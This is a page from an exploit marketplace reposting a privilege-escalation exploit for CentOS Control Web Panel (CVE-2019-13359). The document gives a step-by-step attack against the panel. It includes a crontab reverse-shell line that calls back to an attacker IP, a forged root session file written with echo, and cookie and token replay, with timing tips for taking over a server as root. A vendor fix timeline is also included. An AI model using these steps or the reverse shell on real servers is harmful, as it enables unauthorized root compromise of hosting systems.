0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CentOS Control Web Panel 0.9.8.836 - Privilege Escalation Vulnerability
//====================================================================\\ || || || CWP Control Web Panel 0.9.8.836 - 0.9.8.839 || || Root Privilege Escalation || || || \\====================================================================// # ==================================================================== # Information # ==================================================================== # Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.40 Root Privilege Escalation # Date: 6 July 2019 # Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak # Vendor Homepage: https://control-webpanel.com/changelog # Software Link: http://centos-webpanel.com/cwp-el7-latest (Have to change version in the script) # Version: 0.9.8.836 to 0.9.8.839 # Tested on: CentOS 7.6.1810 (Core) # CVE : CVE-2019-13359 Product : CWP Control Web Panel Vulnerability Name : Root Privilege Escalation version : 0.9.8.836 Fixed on : 0.9.8.840 Test on : Tested on: CentOS 7.6.1810 (Core) Reference : http://centos-webpanel.com/ : https://control-webpanel.com/changelog CVE-Number : CVE-2019-13359 # ==================================================================== # Root course of the vulnerability # ==================================================================== 1. The session file are store at /tmp directory 2. rkey value in the session file dose not change when access by the same source IP address # ==================================================================== # Steps to Reproduce # ==================================================================== Session prepareation state 1. Check the current IP address of attacker 2. Set the IP address on testing environment network 3. Login as root on port 2031/2087 and save the cookie name from web browser (cwsrp-xxxxxxxxxxxxxxxxxxxxx) 4. Copy the content of session file (/tmp/sess_xxxxxxxxxxxxxx) to a new file "sess_123456" # we need "rkey" 5. Save the token value from the session file (cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx) * rkey is created from client ip, then do not change client ip when attack the real target Attack state # # Method 1 Uploading via reverse shell # 1. Go to crontab and set "bash -i >& /dev/tcp/[Attacker-IP]/8000 0>&1" 2. Create session file through reverse shell echo "username|s:4:\"root\";logged|b:1;rkey|s:20:\"[RKEY]\";token|s:36:\"[TOKEN-KEY]\";" > /tmp/sess_123456 3. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php 4. Change file permission "chmod 664 /tmp/sess_123456" 5. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456) 6. Open the URL and become the root user # # Method 2 Uploading via File manager function # 1. On the real target, login as a normal user on port 2083 and upload file "sess_123456" to /tmp directory and set permission to 644 (chmod 664 /tmp/sess_123456) via crontab feature 2. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php 3. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456) 4. Open the URL and become the root user *From step 1 - 4 need doing it quickly. if we do it too slow, the application will change the permission of file sess_123456 to 600, and the file will become 0 byte. If this happened, attacker need to change session file name and repeat the steps again # ==================================================================== # PoC # ==================================================================== https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13359.md # ==================================================================== # Timeline # ==================================================================== 2019-06-30: Discovered the bug 2019-06-30: Reported to vendor 2019-06-30: Vender accepted the vulnerability 2019-07-02: The vulnerability has been fixed 2019-07-06: Published # ==================================================================== # Discovered by # ==================================================================== Pongtorn Angsuchotmetee Nissana Sirijirakal Narin Boonwasanarak # 0day.today [2024-06-30] #